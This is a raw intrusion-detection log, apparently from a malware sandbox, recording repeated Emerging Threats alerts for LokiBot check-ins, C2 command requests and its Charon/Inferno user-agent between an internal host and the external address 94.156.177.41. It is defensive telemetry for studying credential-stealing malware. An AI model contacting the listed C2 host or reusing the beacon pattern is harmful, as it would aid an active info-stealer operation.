                              2025-01-11T08:38:12.040089+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004094.156.177.4180TCP
                              2025-01-11T08:38:12.778136+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004094.156.177.4180TCP
                              2025-01-11T08:38:12.949663+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004194.156.177.4180TCP
                              2025-01-11T08:38:12.949663+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004194.156.177.4180TCP
                              2025-01-11T08:38:12.949663+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004194.156.177.4180TCP
                              2025-01-11T08:38:13.686751+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004194.156.177.4180TCP
                              2025-01-11T08:38:13.842179+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004294.156.177.4180TCP
                              2025-01-11T08:38:13.842179+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004294.156.177.4180TCP
                              2025-01-11T08:38:13.842179+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004294.156.177.4180TCP
                              2025-01-11T08:38:14.556486+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004294.156.177.4180TCP
                              2025-01-11T08:38:14.714006+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004394.156.177.4180TCP
                              2025-01-11T08:38:14.714006+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004394.156.177.4180TCP
                              2025-01-11T08:38:14.714006+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004394.156.177.4180TCP
                              2025-01-11T08:38:15.572731+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004394.156.177.4180TCP
                              2025-01-11T08:38:15.727832+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004494.156.177.4180TCP
                              2025-01-11T08:38:15.727832+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004494.156.177.4180TCP
                              2025-01-11T08:38:15.727832+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004494.156.177.4180TCP
                              2025-01-11T08:38:16.449634+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004494.156.177.4180TCP
                              2025-01-11T08:38:16.602139+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004594.156.177.4180TCP
                              2025-01-11T08:38:16.602139+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004594.156.177.4180TCP
                              2025-01-11T08:38:16.602139+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004594.156.177.4180TCP
                              2025-01-11T08:38:17.326715+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004594.156.177.4180TCP
                              2025-01-11T08:38:17.480431+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004694.156.177.4180TCP
                              2025-01-11T08:38:17.480431+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004694.156.177.4180TCP
                              2025-01-11T08:38:17.480431+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004694.156.177.4180TCP
                              2025-01-11T08:38:18.200103+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004694.156.177.4180TCP
                              2025-01-11T08:38:18.361971+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004794.156.177.4180TCP
                              2025-01-11T08:38:18.361971+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004794.156.177.4180TCP
                              2025-01-11T08:38:18.361971+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004794.156.177.4180TCP
                              2025-01-11T08:38:19.084044+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004794.156.177.4180TCP
                              2025-01-11T08:38:19.243600+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004894.156.177.4180TCP
                              2025-01-11T08:38:19.243600+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004894.156.177.4180TCP
                              2025-01-11T08:38:19.243600+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004894.156.177.4180TCP
                              2025-01-11T08:38:19.943174+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004894.156.177.4180TCP
                              2025-01-11T08:38:20.125882+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95004994.156.177.4180TCP
                              2025-01-11T08:38:20.125882+01002025381ET MALWARE LokiBot Checkin1192.168.2.95004994.156.177.4180TCP
                              2025-01-11T08:38:20.125882+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95004994.156.177.4180TCP
                              2025-01-11T08:38:20.836464+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95004994.156.177.4180TCP
                              2025-01-11T08:38:21.374944+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005094.156.177.4180TCP
                              2025-01-11T08:38:21.374944+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005094.156.177.4180TCP
                              2025-01-11T08:38:21.374944+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005094.156.177.4180TCP
                              2025-01-11T08:38:22.072417+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005094.156.177.4180TCP
                              2025-01-11T08:38:22.229791+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005194.156.177.4180TCP
                              2025-01-11T08:38:22.229791+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005194.156.177.4180TCP
                              2025-01-11T08:38:22.229791+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005194.156.177.4180TCP
                              2025-01-11T08:38:22.938811+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005194.156.177.4180TCP
                              2025-01-11T08:38:23.088593+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005294.156.177.4180TCP
                              2025-01-11T08:38:23.088593+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005294.156.177.4180TCP
                              2025-01-11T08:38:23.088593+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005294.156.177.4180TCP
                              2025-01-11T08:38:23.775451+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005294.156.177.4180TCP
                              2025-01-11T08:38:24.220880+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005394.156.177.4180TCP
                              2025-01-11T08:38:24.220880+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005394.156.177.4180TCP
                              2025-01-11T08:38:24.220880+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005394.156.177.4180TCP
                              2025-01-11T08:38:24.924940+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005394.156.177.4180TCP
                              2025-01-11T08:38:25.073323+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005494.156.177.4180TCP
                              2025-01-11T08:38:25.073323+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005494.156.177.4180TCP
                              2025-01-11T08:38:25.073323+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005494.156.177.4180TCP
                              2025-01-11T08:38:25.792727+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005494.156.177.4180TCP
                              2025-01-11T08:38:25.957719+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005594.156.177.4180TCP
                              2025-01-11T08:38:25.957719+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005594.156.177.4180TCP
                              2025-01-11T08:38:25.957719+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005594.156.177.4180TCP
                              2025-01-11T08:38:26.667801+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005594.156.177.4180TCP
                              2025-01-11T08:38:26.972510+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005694.156.177.4180TCP
                              2025-01-11T08:38:26.972510+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005694.156.177.4180TCP
                              2025-01-11T08:38:26.972510+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005694.156.177.4180TCP
                              2025-01-11T08:38:27.819161+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005694.156.177.4180TCP
                              2025-01-11T08:38:27.976208+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005794.156.177.4180TCP
                              2025-01-11T08:38:27.976208+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005794.156.177.4180TCP
                              2025-01-11T08:38:27.976208+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005794.156.177.4180TCP
                              2025-01-11T08:38:28.682413+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005794.156.177.4180TCP
                              2025-01-11T08:38:28.837379+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005894.156.177.4180TCP
                              2025-01-11T08:38:28.837379+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005894.156.177.4180TCP
                              2025-01-11T08:38:28.837379+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005894.156.177.4180TCP
                              2025-01-11T08:38:29.679562+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005894.156.177.4180TCP
                              2025-01-11T08:38:29.840822+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95005994.156.177.4180TCP
                              2025-01-11T08:38:29.840822+01002025381ET MALWARE LokiBot Checkin1192.168.2.95005994.156.177.4180TCP
                              2025-01-11T08:38:29.840822+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95005994.156.177.4180TCP
                              2025-01-11T08:38:30.528984+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95005994.156.177.4180TCP
                              2025-01-11T08:38:30.693073+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006094.156.177.4180TCP
                              2025-01-11T08:38:30.693073+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006094.156.177.4180TCP
                              2025-01-11T08:38:30.693073+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006094.156.177.4180TCP
                              2025-01-11T08:38:31.418232+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006094.156.177.4180TCP
                              2025-01-11T08:38:31.577126+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006194.156.177.4180TCP
                              2025-01-11T08:38:31.577126+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006194.156.177.4180TCP
                              2025-01-11T08:38:31.577126+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006194.156.177.4180TCP
                              2025-01-11T08:38:32.294702+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006194.156.177.4180TCP
                              2025-01-11T08:38:32.460501+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006294.156.177.4180TCP
                              2025-01-11T08:38:32.460501+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006294.156.177.4180TCP
                              2025-01-11T08:38:32.460501+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006294.156.177.4180TCP
                              2025-01-11T08:38:33.203940+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006294.156.177.4180TCP
                              2025-01-11T08:38:33.646503+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006394.156.177.4180TCP
                              2025-01-11T08:38:33.646503+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006394.156.177.4180TCP
                              2025-01-11T08:38:33.646503+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006394.156.177.4180TCP
                              2025-01-11T08:38:34.375337+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006394.156.177.4180TCP
                              2025-01-11T08:38:34.530472+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006494.156.177.4180TCP
                              2025-01-11T08:38:34.530472+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006494.156.177.4180TCP
                              2025-01-11T08:38:34.530472+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006494.156.177.4180TCP
                              2025-01-11T08:38:35.360232+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006494.156.177.4180TCP
                              2025-01-11T08:38:35.510279+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006594.156.177.4180TCP
                              2025-01-11T08:38:35.510279+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006594.156.177.4180TCP
                              2025-01-11T08:38:35.510279+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006594.156.177.4180TCP
                              2025-01-11T08:38:36.209960+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006594.156.177.4180TCP
                              2025-01-11T08:38:36.471295+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006694.156.177.4180TCP
                              2025-01-11T08:38:36.471295+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006694.156.177.4180TCP
                              2025-01-11T08:38:36.471295+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006694.156.177.4180TCP
                              2025-01-11T08:38:37.179276+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006694.156.177.4180TCP
                              2025-01-11T08:38:37.336378+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006794.156.177.4180TCP
                              2025-01-11T08:38:37.336378+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006794.156.177.4180TCP
                              2025-01-11T08:38:37.336378+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006794.156.177.4180TCP
                              2025-01-11T08:38:38.042783+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006794.156.177.4180TCP
                              2025-01-11T08:38:38.202393+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006894.156.177.4180TCP
                              2025-01-11T08:38:38.202393+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006894.156.177.4180TCP
                              2025-01-11T08:38:38.202393+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006894.156.177.4180TCP
                              2025-01-11T08:38:38.912153+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006894.156.177.4180TCP
                              2025-01-11T08:38:39.238877+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95006994.156.177.4180TCP
                              2025-01-11T08:38:39.238877+01002025381ET MALWARE LokiBot Checkin1192.168.2.95006994.156.177.4180TCP
                              2025-01-11T08:38:39.238877+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95006994.156.177.4180TCP
                              2025-01-11T08:38:39.956976+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95006994.156.177.4180TCP
                              2025-01-11T08:38:40.130128+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007094.156.177.4180TCP
                              2025-01-11T08:38:40.130128+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007094.156.177.4180TCP
                              2025-01-11T08:38:40.130128+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007094.156.177.4180TCP
                              2025-01-11T08:38:40.858919+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007094.156.177.4180TCP
                              2025-01-11T08:38:41.012348+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007194.156.177.4180TCP
                              2025-01-11T08:38:41.012348+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007194.156.177.4180TCP
                              2025-01-11T08:38:41.012348+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007194.156.177.4180TCP
                              2025-01-11T08:38:41.746972+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007194.156.177.4180TCP
                              2025-01-11T08:38:41.968094+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007294.156.177.4180TCP
                              2025-01-11T08:38:41.968094+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007294.156.177.4180TCP
                              2025-01-11T08:38:41.968094+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007294.156.177.4180TCP
                              2025-01-11T08:38:42.661261+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007294.156.177.4180TCP
                              2025-01-11T08:38:42.823353+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007394.156.177.4180TCP
                              2025-01-11T08:38:42.823353+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007394.156.177.4180TCP
                              2025-01-11T08:38:42.823353+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007394.156.177.4180TCP
                              2025-01-11T08:38:43.538124+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007394.156.177.4180TCP
                              2025-01-11T08:38:43.698121+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007494.156.177.4180TCP
                              2025-01-11T08:38:43.698121+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007494.156.177.4180TCP
                              2025-01-11T08:38:43.698121+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007494.156.177.4180TCP
                              2025-01-11T08:38:44.418883+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007494.156.177.4180TCP
                              2025-01-11T08:38:44.595801+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007594.156.177.4180TCP
                              2025-01-11T08:38:44.595801+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007594.156.177.4180TCP
                              2025-01-11T08:38:44.595801+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007594.156.177.4180TCP
                              2025-01-11T08:38:45.460503+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007594.156.177.4180TCP
                              2025-01-11T08:38:45.627870+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007694.156.177.4180TCP
                              2025-01-11T08:38:45.627870+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007694.156.177.4180TCP
                              2025-01-11T08:38:45.627870+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007694.156.177.4180TCP
                              2025-01-11T08:38:46.349034+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007694.156.177.4180TCP
                              2025-01-11T08:38:46.516711+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007794.156.177.4180TCP
                              2025-01-11T08:38:46.516711+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007794.156.177.4180TCP
                              2025-01-11T08:38:46.516711+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007794.156.177.4180TCP
                              2025-01-11T08:38:47.254357+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007794.156.177.4180TCP
                              2025-01-11T08:38:47.424671+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007894.156.177.4180TCP
                              2025-01-11T08:38:47.424671+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007894.156.177.4180TCP
                              2025-01-11T08:38:47.424671+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007894.156.177.4180TCP
                              2025-01-11T08:38:48.123391+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007894.156.177.4180TCP
                              2025-01-11T08:38:48.273476+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95007994.156.177.4180TCP
                              2025-01-11T08:38:48.273476+01002025381ET MALWARE LokiBot Checkin1192.168.2.95007994.156.177.4180TCP
                              2025-01-11T08:38:48.273476+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95007994.156.177.4180TCP
                              2025-01-11T08:38:48.972039+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95007994.156.177.4180TCP
                              2025-01-11T08:38:49.116902+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008094.156.177.4180TCP
                              2025-01-11T08:38:49.116902+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008094.156.177.4180TCP
                              2025-01-11T08:38:49.116902+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008094.156.177.4180TCP
                              2025-01-11T08:38:49.816159+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008094.156.177.4180TCP
                              2025-01-11T08:38:49.960016+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008194.156.177.4180TCP
                              2025-01-11T08:38:49.960016+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008194.156.177.4180TCP
                              2025-01-11T08:38:49.960016+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008194.156.177.4180TCP
                              2025-01-11T08:38:50.672196+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008194.156.177.4180TCP
                              2025-01-11T08:38:50.825321+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008294.156.177.4180TCP
                              2025-01-11T08:38:50.825321+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008294.156.177.4180TCP
                              2025-01-11T08:38:50.825321+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008294.156.177.4180TCP
                              2025-01-11T08:38:51.546237+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008294.156.177.4180TCP
                              2025-01-11T08:38:51.695758+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008394.156.177.4180TCP
                              2025-01-11T08:38:51.695758+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008394.156.177.4180TCP
                              2025-01-11T08:38:51.695758+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008394.156.177.4180TCP
                              2025-01-11T08:38:52.407655+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008394.156.177.4180TCP
                              2025-01-11T08:38:52.555444+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008494.156.177.4180TCP
                              2025-01-11T08:38:52.555444+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008494.156.177.4180TCP
                              2025-01-11T08:38:52.555444+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008494.156.177.4180TCP
                              2025-01-11T08:38:53.255014+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008494.156.177.4180TCP
                              2025-01-11T08:38:53.414347+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008594.156.177.4180TCP
                              2025-01-11T08:38:53.414347+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008594.156.177.4180TCP
                              2025-01-11T08:38:53.414347+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008594.156.177.4180TCP
                              2025-01-11T08:38:54.122050+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008594.156.177.4180TCP
                              2025-01-11T08:38:54.273813+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008694.156.177.4180TCP
                              2025-01-11T08:38:54.273813+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008694.156.177.4180TCP
                              2025-01-11T08:38:54.273813+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008694.156.177.4180TCP
                              2025-01-11T08:38:54.976683+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008694.156.177.4180TCP
                              2025-01-11T08:38:55.134435+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008794.156.177.4180TCP
                              2025-01-11T08:38:55.134435+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008794.156.177.4180TCP
                              2025-01-11T08:38:55.134435+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008794.156.177.4180TCP
                              2025-01-11T08:38:55.873721+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008794.156.177.4180TCP
                              2025-01-11T08:38:56.036472+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008894.156.177.4180TCP
                              2025-01-11T08:38:56.036472+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008894.156.177.4180TCP
                              2025-01-11T08:38:56.036472+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008894.156.177.4180TCP
                              2025-01-11T08:38:56.740058+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008894.156.177.4180TCP
                              2025-01-11T08:38:56.987645+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95008994.156.177.4180TCP
                              2025-01-11T08:38:56.987645+01002025381ET MALWARE LokiBot Checkin1192.168.2.95008994.156.177.4180TCP
                              2025-01-11T08:38:56.987645+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95008994.156.177.4180TCP
                              2025-01-11T08:38:57.718537+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95008994.156.177.4180TCP
                              2025-01-11T08:38:57.870196+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95009094.156.177.4180TCP
                              2025-01-11T08:38:57.870196+01002025381ET MALWARE LokiBot Checkin1192.168.2.95009094.156.177.4180TCP
                              2025-01-11T08:38:57.870196+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95009094.156.177.4180TCP
                              2025-01-11T08:38:58.557574+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95009094.156.177.4180TCP
                              2025-01-11T08:38:58.710492+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95009194.156.177.4180TCP
                              2025-01-11T08:38:58.710492+01002025381ET MALWARE LokiBot Checkin1192.168.2.95009194.156.177.4180TCP
                              2025-01-11T08:38:58.710492+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95009194.156.177.4180TCP
                              2025-01-11T08:38:59.435116+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95009194.156.177.4180TCP
                              2025-01-11T08:38:59.655514+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95009294.156.177.4180TCP
                              2025-01-11T08:38:59.655514+01002025381ET MALWARE LokiBot Checkin1192.168.2.95009294.156.177.4180TCP
                              2025-01-11T08:38:59.655514+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95009294.156.177.4180TCP
                              2025-01-11T08:39:00.362103+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95009294.156.177.4180TCP
                              2025-01-11T08:39:00.512250+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95009394.156.177.4180TCP
                              2025-01-11T08:39:00.512250+01002025381ET MALWARE LokiBot Checkin1192.168.2.95009394.156.177.4180TCP
                              2025-01-11T08:39:00.512250+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95009394.156.177.4180TCP
                              2025-01-11T08:39:01.205421+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95009394.156.177.4180TCP
                              2025-01-11T08:39:01.365444+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95009494.156.177.4180TCP
                              2025-01-11T08:39:01.365444+01002025381ET MALWARE LokiBot Checkin1192.168.2.95009494.156.177.4180TCP
                              2025-01-11T08:39:01.365444+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95009494.156.177.4180TCP
                              2025-01-11T08:39:02.212934+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95009494.156.177.4180TCP
                              2025-01-11T08:39:02.473916+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95009594.156.177.4180TCP
                              2025-01-11T08:39:02.473916+01002025381ET MALWARE LokiBot Checkin1192.168.2.95009594.156.177.4180TCP
                              2025-01-11T08:39:02.473916+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95009594.156.177.4180TCP
                              2025-01-11T08:39:03.191625+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95009594.156.177.4180TCP
                              2025-01-11T08:39:03.353242+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95009694.156.177.4180TCP
                              2025-01-11T08:39:03.353242+01002025381ET MALWARE LokiBot Checkin1192.168.2.95009694.156.177.4180TCP
                              2025-01-11T08:39:03.353242+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95009694.156.177.4180TCP
                              2025-01-11T08:39:04.061459+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95009694.156.177.4180TCP
                              2025-01-11T08:39:04.211638+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.95009794.156.177.4180TCP
                              2025-01-11T08:39:04.211638+01002025381ET MALWARE LokiBot Checkin1192.168.2.95009794.156.177.4180TCP
                              2025-01-11T08:39:04.211638+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.95009794.156.177.4180TCP
                              2025-01-11T08:39:04.924708+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.95009794.156.177.4180TCP
